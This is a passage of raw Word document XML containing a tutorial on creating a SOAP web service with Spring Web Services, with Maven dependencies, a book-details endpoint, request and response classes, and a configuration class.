      </w:r>
    </w:p>
    <w:p w14:paraId="0120728D" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1811"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Web Services (for SOAP service creation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D72FB7" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Create a Maven/Gradle Project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4E5B8F"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If using Maven, create a pom.xml file with the necessary dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1B731C"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Maven dependencies (pom.xml)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BE42B"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lt;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580D2E25"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB02A32"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groupId&gt;org.springframework.ws&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F7117"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artifactId&gt;spring-webservices&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB270A6"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version&gt;3.0.0&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17985C5C"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1BF6E9"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADC190C"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B99104"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artifactId&gt;spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD0E03"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240F4E7A"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A42596F"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6E0397"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artifactId&gt;spring-boot-starter-logging&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C92E5"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EC2944"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F7F9E3"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groupId&gt;org.springframework.ws&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A2751"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artifactId&gt;spring-xml&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180354ED"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version&gt;3.0.0&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DDD44D"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23265D66"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lt;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D9DA37" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Define Your Web Service Endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D952062"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The endpoint exposes the methods that can be invoked remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08367B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of a Web Service Endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1ECF4C"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Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C035C72"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public class BookEndpoint {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE3FFB" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE94D5D"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private static final String NAMESPACE_URI = "http://example.com/webservice";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04499FB6" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1780C211"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PayloadRoot(namespace = NAMESPACE_URI, localPart = "getBookDetailsRequest")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A1BB73"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ResponsePayload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A10A3C"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public GetBookDetailsResponse getBookDetails(@RequestPayload GetBookDetailsRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6112895F"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GetBookDetailsResponse response = new GetBookDetailsResponse();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2CD8CE"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response.setBookTitle("Introduction to SOAP");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168621C4"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response.setAuthor("John Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CA2842"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response.setPrice(29.99);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10772D78"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return response;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4717FEA1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E903C81"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6E0EC8" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1812"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Marks the class as an endpoint for handling SOAP messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F39FA7A" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1812"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@PayloadRoot</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the namespace and the local part of the request message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4B02D8" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1812"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@RequestPayload</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Binds the SOAP request object to the method parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB90138" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1812"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ResponsePayload</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies that the return value of the method will be used as the SOAP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7098A4" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Create Request and Response Classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C7025"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These classes represent the request and response XML structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3887077F"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Request Class (GetBookDetailsRequest.java)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3754A0"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XmlRootElement(name = "getBookDetailsRequest")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B64E85"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public class GetBookDetailsRequest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EF40B4"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private String bookId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6991DA95" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7B71E1"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public String getBookId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CC7FDB"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return bookId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6551DA76"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1036BBE9" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED3815C"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public void setBookId(String bookId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3316643D"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this.bookId = bookId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D104C60"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F055E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738DE925"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Response Class (GetBookDetailsResponse.java)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26363657"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XmlRootElement(name = "getBookDetailsResponse")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF71DD"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public class GetBookDetailsResponse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194FDEFD"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private String bookTitle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A5020"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private String author;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A50A8A6"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private double price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0362DE05" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EC2715"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public String getBookTitle() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A40C1F"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return bookTitle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0871E3A6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14370E61" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2F661F"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public void setBookTitle(String bookTitle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786D86A7"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this.bookTitle = bookTitle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD3BB3E"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2F5B2" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F585BAC"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public String getAuthor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC19D31"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return author;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB84B1F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2226DAE0" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A78B88"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public void setAuthor(String author) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A0B72D"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this.author = author;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9FF9DD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4155D2" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E864A04"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public double getPrice() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D27330"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return price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499DC52"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA5EE23" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01AD7EF9"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public void setPrice(double price) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ECCA28"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this.price = price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5214471C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8E133"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE44E2C" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Configure Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D97D683"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In Spring-based applications, you need to configure the SOAP service to listen to incoming requests and send appropriate responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050D21FB"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Configuration Class (WebServiceConfig.java)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD4B1C"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B976277"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EnableWs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A93B49"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public class WebServiceConfig extends WsConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C542102" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32831A20"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E13A4"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public ServletRegistrationBean messageDispatcherServlet() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6794687F"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ServletRegistrationBean registrationBean = new ServletRegistrationBean(new MessageDispatcherServlet(), "/ws/*");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4379BBE2"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registrationBean.setLoadOnStartup(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3029AE96"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return registrationBean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B7008"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A5BDF2" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0674BAFE"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47366017"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public DefaultWsdl11Definition defaultWsdl11Definition(XsdSchema bookSchema) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C112694"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DefaultWsdl11Definition wsdl11Definition = new DefaultWsdl11Definition();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901B58A"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wsdl11Definition.setPortTypeName("BookServicePort");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219E2456"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wsdl11Definition.setLocationUri("/ws");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE4A95E"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wsdl11Definition.setTargetNamespace("http://example.com/webservice");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414268D8"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wsdl11Definition.setSchema(bookSchema);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBCFD50"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return wsdl11Definition;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4EAD8C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41649246" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4C6D08"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FFB16E"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public XsdSchema bookSchema() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C46CDE3"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return new SimpleXsdSchema(new ClassPathResource("book.xsd"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635539EE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579C4FB4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AA89FA" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1813"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@EnableWs</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enables Spring Web Services configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037C10A5" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1813"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
